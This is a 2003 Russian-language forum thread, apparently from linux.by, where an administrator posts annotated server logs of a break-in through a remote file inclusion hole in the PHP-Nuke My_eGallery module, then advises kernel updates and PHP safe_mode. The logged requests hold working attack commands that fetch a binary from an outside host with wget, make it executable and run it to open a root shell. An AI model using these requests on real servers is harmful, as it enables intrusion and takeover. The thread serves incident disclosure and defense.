Как ломали www.linux.by

Anonymous · Сообщение **Anonymous** » 15 дек 2003, 22:25

Ломал этот сервер некий кул-хацкар, использующий серверы в Бразилии. Хакера зовут PsychoPhobia, можете через гугл полюбоваться на "тоску" его достижений. Вот пример того, что происходило (и это далеко не все):

200.98.117.45 - - [12/Dec/2003:08:46:15 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/home/hosts/linux/linux.by/www/www.linux.by;lynx%20-source%20http://hack0.tripod.com.br/cgi%20>%20cgi
HTTP/1.1" 200 19596
Пытаемся залит файл cgi с помощью lynx. Эта команда на прошла.

200.98.117.45 - - [12/Dec/2003:08:47:52 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;wget%20http://hack0.tripod.com.br/cgi HTTP/1.1" 200 1825
Здесь пытаемся залить с помощью wget. А вот эта успешно завершилась. Ее
результат - появление на сервере в каталоге /tmp файла cgi.

200.98.117.45 - - [12/Dec/2003:08:48:12 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20+x%20cgi HTTP/1.1" 200 1544
Здесь пытаемся дать права на исполнение файлу, но опять-таки - не
проканало.

200.98.117.45 - - [12/Dec/2003:08:48:19 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;chmod%20777%20cgi HTTP/1.1" 200 1512
А вот эта команда изменила права на файл /tmp/cgi на 777

200.98.117.45 - - [12/Dec/2003:08:48:24 +0200] "GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?
&cmd=cd%20/tmp;./cgi HTTP/1.1" 200 1564
А этой командой мы запустили файл на исполнение. Все - висим в памяти и
слушаем порт 44464. Далее заходим телнетом на порт и получаем рутовую консоль.

Таким-же образом хакер запускал сервер телнета и проделывал всякие-разные нехорошие штуки. Но к сожалению он обломался. Сейчас-же дыры еще более законопачены. Более того, XStranger в процессе смены движка сайта.

Резюме, так сказать. Уважаемые господа, если у кого есть хосты под Linux с
реальными адресами, на которых запущен Apache и есть навороченные
средства управления контентом сайтов и т.п. - срочно обновляйте ядро. Именно это и надо делать в первую очередь, особенно тем, кто считает что
BRK эксплоит сугубо локальный. А еще, затыкайте пхпнюк, или как минимум, выставляйие safemode в php.ini.

Anonymous · Сообщение **Anonymous** » 15 дек 2003, 22:29

Забыл сказать, что по этой причине сегодня сервер находился на ремонте среди дня суммарно около двух часов.

Сообщение **X-Stranger** » 16 дек 2003, 16:05

Знал бы кто, как задрали эти бразильские кулхацкеры и эти вечно находимые новые дыры

Все, делаю новый движок на linux.by...

leikind · Сообщение **leikind** » 16 дек 2003, 16:54

Объясните ламеру, с какой такой радости displayCategory.php запускает все, что ему присылают в параметре cmd?

Anonymous · Сообщение **Anonymous** » 16 дек 2003, 18:06

Запускает не он, а типа картинка, выставленная в basepath. И пока не включен safe mode, php может брать для basepath внешние ресурсы. Очевидная дырка в том, что он распознает картинки по расширению, а не по контенту.

leikind · Сообщение **leikind** » 16 дек 2003, 18:35

понял